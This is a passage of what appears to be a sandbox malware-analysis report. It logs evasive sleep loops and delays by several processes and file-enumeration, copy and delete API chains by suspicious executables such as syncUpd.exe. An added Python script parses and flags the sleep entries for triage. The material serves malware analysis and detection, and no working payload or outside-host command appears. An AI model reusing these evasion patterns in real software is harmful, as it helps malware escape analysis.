                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -582906s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -582593s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -582125s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -581828s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -581515s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -581234s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580962s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580777s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580553s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -580078s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579764s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579608s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579418s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -579047s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -578797s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -578406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -578062s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -577687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -577500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -577218s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -576718s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -576203s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -575797s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -575390s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -574890s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -573625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -572984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -572172s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -571250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -569531s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -567953s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -567406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -566984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -566156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -565328s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -564625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -563703s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -562890s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -561922s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -561281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -560609s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -559609s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -558734s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -557781s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -556687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -555359s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -554500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -553687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -550154s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -549123s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -548388s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -547285s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -546625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -545943s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -544442s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -543574s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -542777s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -541993s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -540668s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -540261s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -539466s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -538740s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -538374s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537952s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537716s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537483s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -537249s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536944s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536694s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536376s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -536049s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535747s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535508s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535314s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -535010s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -534399s >= -30000s
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 796Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 32316Thread sleep count: 34 > 30
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 32316Thread sleep time: -2040000s >= -30000s
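The sleep entries above, and the "Thread delayed" entries further down, are the raw evidence behind the report's evasive-sleep verdict, but a few hundred near-identical lines are hard to read. The script below is an added triage helper for this page; it is not Joe Sandbox code. It parses the lines in the form they appear here (tolerating the missing space before "Thread" and the trailing "Jump to behavior" link text that extraction left behind), aggregates them per process and thread ID, and reports which of the report's own thresholds each thread crossed: a single sleep of at least 30000, more than 30 sleeps in a loop, or a wait of effectively unbounded length. Two assumptions are mine rather than the report's: that the numbers are milliseconds (the 30000 threshold then corresponds to the 30-second evasive-sleep limit, and 600000 to the ten-minute "delay time: 600000" entries), and that a value of 922337203685477 or more, which is Int64.MaxValue expressed in 100-nanosecond ticks divided by 10000, is a sentinel for an unbounded wait and should be flagged rather than added to the totals. The sample lines at the bottom are a constructed subset copied from this section.

```python
"""Triage the thread sleep / delay evasion entries of a Joe Sandbox report.

Added example for this page, not Joe Sandbox code. Assumptions (mine, not the
report's): values are milliseconds, and anything >= UNBOUNDED_MS is treated as
an unbounded wait rather than a real duration.
"""
import re
from collections import defaultdict

LONG_SLEEP_MS = 30_000                 # the report's own "-30000s" threshold
LOOP_COUNT = 30                        # the report's own "> 30" sleep-count threshold
UNBOUNDED_MS = (2**63 - 1) // 10_000   # 922337203685477: Int64.MaxValue ticks as ms

SLEEP_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>time|count):\s*-?(?P<value>\d+)s?\s*>=?\s*-?\d+s?"
)
DELAY_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*Thread delayed:\s*delay time:\s*(?P<value>\d+)"
)


def parse_entry(line):
    """Parse one report line; return a dict, or None for unrelated lines."""
    line = line.replace("Jump to behavior", "").strip()   # strip link residue
    m = SLEEP_RE.search(line)
    if m:
        return {"proc": m["proc"], "tid": int(m["tid"]),
                "kind": m["kind"], "value": int(m["value"])}
    m = DELAY_RE.search(line)
    if m:
        # 'Thread delayed' entries carry no TID, so they aggregate per process.
        return {"proc": m["proc"], "tid": None, "kind": "time",
                "value": int(m["value"])}
    return None


def summarize(lines, long_ms=LONG_SLEEP_MS, loop_count=LOOP_COUNT):
    """Aggregate entries per (process, tid) and list the thresholds crossed."""
    stats = defaultdict(lambda: {"calls": 0, "max_ms": 0, "total_ms": 0,
                                 "reported_count": 0, "unbounded": False})
    for line in lines:
        e = parse_entry(line)
        if e is None:
            continue
        s = stats[(e["proc"], e["tid"])]
        if e["kind"] == "count":
            # The sandbox already counted the loop; keep the largest claim.
            s["reported_count"] = max(s["reported_count"], e["value"])
            continue
        s["calls"] += 1
        if e["value"] >= UNBOUNDED_MS:
            s["unbounded"] = True      # sentinel-sized wait: flag it, don't sum it
            continue
        s["max_ms"] = max(s["max_ms"], e["value"])
        s["total_ms"] += e["value"]

    report = {}
    for key, s in stats.items():
        flags = []
        if s["max_ms"] >= long_ms:
            flags.append("long_sleep")
        if max(s["calls"], s["reported_count"]) > loop_count:
            flags.append("sleep_loop")
        if s["unbounded"]:
            flags.append("unbounded_wait")
        report[key] = {**s, "flags": flags}
    return report


def render(report):
    """One readable line per (process, tid), worst offenders first."""
    rows = sorted(report.items(),
                  key=lambda kv: (kv[1]["unbounded"], kv[1]["total_ms"]), reverse=True)
    out = []
    for (proc, tid), s in rows:
        name = proc.rsplit("\\", 1)[-1]
        who = f"{name} TID {tid}" if tid is not None else f"{name} (delayed)"
        out.append(f"{who}: {s['calls']} call(s), max {s['max_ms'] / 1000:.1f}s, "
                   f"total {s['total_ms'] / 1000:.1f}s, flags={s['flags'] or '-'}")
    return out


# Constructed sample: lines copied from this section, exactly as extracted.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -98032s >= -30000sJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -97921s >= -30000sJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7848Thread sleep time: -97806s >= -30000sJump to behavior",
    r"Source: C:\Windows\System32\svchost.exe TID: 7700Thread sleep time: -30000s >= -30000sJump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44576Thread sleep time: -922337203685477s >= -30000sJump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -600000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44660Thread sleep count: 8571 > 30",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -599822s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 32316Thread sleep count: 34 > 30",
    r"Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe TID: 32316Thread sleep time: -2040000s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000Jump to behavior",
    r"Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior",   # ignored
]

if __name__ == "__main__":
    for row in render(summarize(SAMPLE_LINES)):
        print(row)
```

Feed it the whole signature section (one line per entry) and the InstallUtil.exe thread 44652 stands out immediately: well over 30 sleeps of roughly ten minutes each, which is the pattern the "sleep count > 30" and "sleep time >= 30000" signatures are built to catch. The sentinel handling matters in practice: a single 922337203685477 value would otherwise dwarf every real duration in the totals and hide the loop.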
                         Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                         Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                         Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                         Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                         Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                         Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00452A60 FindFirstFileA,GetLastError,14_2_00452A60
                         Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,14_2_00474F88
                         Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,14_2_004980A4
                         Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00464158
                         Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00462750 FindFirstFileA,FindNextFileA,FindClose,14_2_00462750
                         Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00463CDC
                         Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe Code function: 15_2_00408123 FindFirstFileA,FindClose,15_2_00408123
                         Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe Code function: 15_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,15_2_004085B8
                         Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe Code function: 15_2_0040342B FindFirstFileA,15_2_0040342B
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0040D1C0
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_004015C0
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,17_2_00411650
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,17_2_0040B610
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,17_2_0040DB60
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040D540
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00412570
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,17_2_004121F0
                         Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00411B80
                         Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: 12_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,12_2_00409B78
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 100000
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99859
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99750
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99625
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99448
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99326
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99212
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99109
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98984
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98858
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98744
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98636
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98527
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98421
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98312
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98159
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98032
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 97921
                         Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 97806
                         Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                         Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 300000
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599822
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599671
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599500
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599368
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599250
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599140
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599031
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598922
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598788
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598667
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598561
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598417
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598276
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598136
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598015
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597781
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597649
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597527
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597379
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597250
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597057
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596941
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596812
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596680
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596592
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596447
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596312
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596191
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596071
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595922
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595691
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595571
                         Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595412
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594907
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594368
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594191
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593858
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592816
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592633
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592169
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591953
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 591609
